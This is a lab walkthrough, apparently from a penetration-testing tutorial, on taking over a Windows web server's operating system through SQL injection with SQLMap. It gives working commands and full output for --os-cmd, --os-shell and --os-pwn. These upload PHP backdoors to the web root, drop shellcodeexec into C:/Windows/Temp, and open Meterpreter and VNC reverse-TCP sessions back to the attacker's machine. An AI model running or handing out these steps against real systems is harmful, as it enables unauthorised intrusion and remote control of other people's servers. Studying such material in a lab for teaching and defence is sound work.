Operating System takeover with SQLMap

Various commands in SQLMap would allow us to execute system commands upon the underlying operating system. 

From the SQLMap Advanced help menu (sqlmap -hh), we have found several switches under the Operating System Access section, which can especially be used in order to take over the operating system.

  Operating system access:

    These options can be used to access the back-end database management

    system underlying operating system

    --os-cmd=OSCMD      Execute an operating system command

    --os-shell          Prompt for an interactive operating system shell

    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC

    --os-bof            Stored procedure buffer overflow exploitation

    --priv-esc          Database process user privilege escalation

    --msf-path=MSFPATH  Local path where Metasploit Framework is installed

    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

In this chapter, we will be going to discuss the first three switches to take over the operating system, which are listed below:

•     --os-cmd=OSCMD      Execute an operating system command
•     --os-shell          Prompt for an interactive operating system shell
•     --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

OS-cmd

The --os-cmd switch can be used to execute commands on the target operating system by using the load File functionality.

Let us try executing the “whoami” command, and try to get the result in our previously used URL which consists of a GET parameter.

Use the below command, and supply a Windows command after the --os-cmd switch:

┌──(kali㉿kali)-[~]

└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=1 --os-cmd=whoami

The “whoami” command displays the user, group, and privileges information for the user who is currently logged on to the local system.

On execution, it will prompt basic queries related to your Target system:

---

[11:51:29] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: Apache 2.4.37, PHP 5.6.39

back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[11:51:29] [INFO] going to use a web backdoor for command execution

[11:51:29] [INFO] fingerprinting the back-end DBMS operating system

[11:51:29] [INFO] the back-end DBMS operating system is Windows

which web application language does the web server support?

[1] ASP (default)

[2] ASPX

[3] JSP

[4] PHP

> 4              # As my Target system web server supports PHP 

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y

[11:51:33] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 1           # Writable Directory is the location where the web server contents are located.

Once these are done, SQLMap tries to upload its stager and returns back with a value of the given command.

[11:51:42] [WARNING] unable to automatically parse any web server path

[11:51:42] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[11:51:43] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://192.168.56.108:80/tmpuvtbe.php

[11:51:43] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://192.168.56.108:80/tmpbgjhl.php

Here is the output of the successful execution of the command:

do you want to retrieve the command standard output? [Y/n/a] y

command standard output: 'oprekin-pc\windows-pc'

As you can notice, I have highlighted the standard output. After each operation, the uploaded web file automatically removed.

[11:51:46] [INFO] cleaning up the web files uploaded

[11:51:47] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 2 times

In this similar way, you can use any shell command to get Windows output.

OS-Shell

If os-cmd switch looks complicated, then, do not worry. SQLMap provides --os-shell switch, which can be used to interact with Windows shell directly.

Fire up the terminal and type the following command:

┌──(kali㉿kali)-[~]

└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=1 --os-shell

Similar to the previous switch, it will also prompt some basic platform-related queries. Now, we need to input some basic platform-related queries.

---

[12:28:47] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: Apache 2.4.37, PHP 5.6.39

back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[12:28:47] [INFO] going to use a web backdoor for command execution

[12:28:47 [INFO] fingerprinting the back-end DBMS operating system

[12:28:47] [INFO] the back-end DBMS operating system is Windows

which web application language does the web server support?

[1] ASP (default)

[2] ASPX

[3] JSP

[4] PHP

> 4              # As my Target system web server supports PHP 

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y

[12:28:53] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2          # Writable Directory is the location where the web server contents are located.

Now we have to provide a comma separate list of absolute directory paths:

please provide a comma separate list of absolute directory paths: c:/xampp/htdocs/

[12:29:09] [WARNING] unable to automatically parse any web server path

[12:29:09] [INFO] trying to upload the file stager on 'c:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method

Once these are done, SQLMap tries to upload its stager and returns with an interactive shell to the web server. 

[12:29:09] [INFO] the file stager has been successfully uploaded on 'c:/xampp/htdocs/' - http://192.168.56.108:80/tmpuelfr.php

[12:29:09] [INFO] the backdoor has been successfully uploaded on 'c:/xampp/htdocs/' - http://192.168.56.108:80/tmpbyfjq.php

This feature of SQLMap is quite magnificent and easily allows us to get a shell.

[12:29:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> 

Now, we are ready, let’s input the windows shell command.

os-shell> whoami

do you want to retrieve the command standard output? [Y/n/a] y

command standard output: 'oprekin-pc\windows-pc'

os-shell> dir

do you want to retrieve the command standard output? [Y/n/a] y

command standard output:

---

Volume in drive C has no label.

 Volume Serial Number is 8E39-833B

 Directory of C:\xampp\htdocs

12/14/2022  09:29 AM    <DIR>          .

12/14/2022  09:29 AM    <DIR>          ..

02/27/2017  01:36 AM             3,607 applications.html

02/27/2017  01:36 AM               177 bitnami.css

12/06/2022  09:03 AM    <DIR>          dashboard

07/16/2015  07:32 AM            30,894 favicon.ico

12/06/2022  09:03 AM    <DIR>          img

07/16/2015  07:32 AM               260 index.php

12/13/2022  02:41 AM               326 shell.php

12/06/2022  09:10 AM    <DIR>          sqli-labs-master

12/13/2022  02:34 AM                15 test.html

12/14/2022  09:03 AM               866 tmpbakgn.php

12/14/2022  08:57 AM               866 tmpbbjnz.php

12/14/2022  09:24 AM               866 tmpbgvzv.php

12/14/2022  09:11 AM               866 tmpbskql.php

12/14/2022  09:00 AM               866 tmpbvmby.php

12/14/2022  09:29 AM               866 tmpbyfjq.php

12/14/2022  09:11 AM               721 tmpuanjm.php

12/14/2022  08:57 AM               721 tmpudofe.php

12/14/2022  09:29 AM               721 tmpuelfr.php

12/14/2022  09:24 AM               721 tmpujjvb.php

12/14/2022  09:03 AM               721 tmpupera.php

12/14/2022  09:00 AM               721 tmputnnt.php

12/06/2022  09:03 AM    <DIR>          webalizer

12/06/2022  09:03 AM    <DIR>          xampp

              18 File(s)         44,801 bytes

               7 Dir(s)  101,004,169,216 bytes free

---

os-shell>

This highlighted text of the output of the “whoami” and “dir” commands executed via os-shell. After each operation, the uploaded web file automatically removed.

Type "q" to quit the session:

os-shell> q

[12:29:42] [INFO] cleaning up the web files uploaded

[12:29:42] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 2 times

[12:29:42] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'

Let's proceed for next switch.

OS-PWN

The --os-pwn switch of SQLMap allows the attacker to spawn an interactive command prompt, a Meterpreter session, or a Graphical user interface (VNC) session.

Its usage is quite simple, use the following command to proceed for spawn a session:

┌──(kali㉿kali)-[~]

└─$ sudo sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=1 --os-pwn

Rembember: The OS-PWN switch may not work properly with normal users, so run it with the sudo command.

Similar to the previous switch, it will also prompt some basic platform-related queries. Now, we need to input some basic platform-related queries.

[12:31:04] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.6.39, Apache 2.4.37

back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[12:31:04] [INFO] fingerprinting the back-end DBMS operating system

[12:31:04] [INFO] the back-end DBMS operating system is Windows

how do you want to establish the tunnel?

[1] TCP: Metasploit Framework (default)

[2] ICMP: icmpsh - ICMP tunneling

> 1                            # Use Metasploitable Framework

[12:31:18] [INFO] going to use a web backdoor to establish the tunnel

which web application language does the web server support?

[1] ASP (default)

[2] ASPX

[3] JSP

[4] PHP

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y

[12:31:28] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 1

Once these are done, SQLMap tries to upload its stager and returns with an interactive shell to the web server. In the end it will prompt us to choose the connection type:

which connection type do you want to use?

[1] Reverse TCP: Connect back from the database host to this machine (default)

[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535

[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP

[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS

[5] Bind TCP: Listen on the database host for a connection

> 1         # Reverse TCP is a good choice for establishing a connection

what is the local address? [Enter for '192.168.56.101' (detected)] # No need to change LHost, LPort

which local port number do you want to use? [46983] 

which payload do you want to use?

[1] Meterpreter (default)

[2] Shell

[3] VNC

>

Let’s start with Meterpreter

Type number 1, to create a meterpreter session. On execution SQLMap try to upload a shellcode exec file to \Temp directory.

which payload do you want to use?

[1] Meterpreter (default)

[2] Shell

[3] VNC

> 1

[12:44:17] [INFO] creation in progress ................................ done

[12:44:49] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsefuvq.exe'

[12:44:49] [INFO] shellcodeexec successfully uploaded

It will automatically create a shell code and upload it to the temp directory. Once the upload was successful, it will automatically launch the msfconsole.

Now as you can notice, we have got a meterpreter session.

meterpreter > pwd

c:\xampp\htdocs

meterpreter > shell 

Process 1676 created.

Channel 1 created.

Microsoft Windows [Version 10.0.*******.***]

(c) 2019 Microsoft Corportation. All rights reserved.

C:\xampp\htdocs>

Let’s inject a VNC session

Type number 3, to create a meterpreter session. On execution, SQLMap tries to upload a shellcode exec file to \Temp directory and launch msfconsole.

which payload do you want to use?

[1] Meterpreter (default)

[2] Shell

[3] VNC

> 3

[12:44:17] [INFO] creation in progress ................................ done

[12:44:49] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsefuvq.exe'

[12:44:49] [INFO] shellcodeexec successfully uploaded

[12:44:49] [INFO] running Metasploit Framework command line interface locally, please wait..

                                   ____________

 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                

 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                

 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]                                                

 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]                                                

 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]                                                

 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]                                                

 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                

 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                

 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                

 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]                                                

                                                                                                                               

       =[ metasploit v6.2.9-dev                           ]

+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]

+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]

+ -- --=[ 9 evasion                                       ]

Metasploit tip: Display the Framework log using the 

log command, learn more with help log

[*] Using configured payload generic/shell_reverse_tcp

PAYLOAD => windows/vncinject/reverse_tcp

EXITFUNC => process

LPORT => 18860

LHOST => 192.168.56.101

DisableCourtesyShell => true

[*] Started reverse TCP handler on 192.168.56.101:18860 

[12:45:22] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..

[*] Sending stage (401920 bytes) to 192.168.56.108

[*] Starting local TCP relay on 127.0.0.1:5900...

[*] Local TCP relay started.

[*] Launched vncviewer.

[*] Session 1 created in the background.

In the end msfconsole automatically creates a VNC session.

As we can see, we have successfully managed to VNC session via SQL map.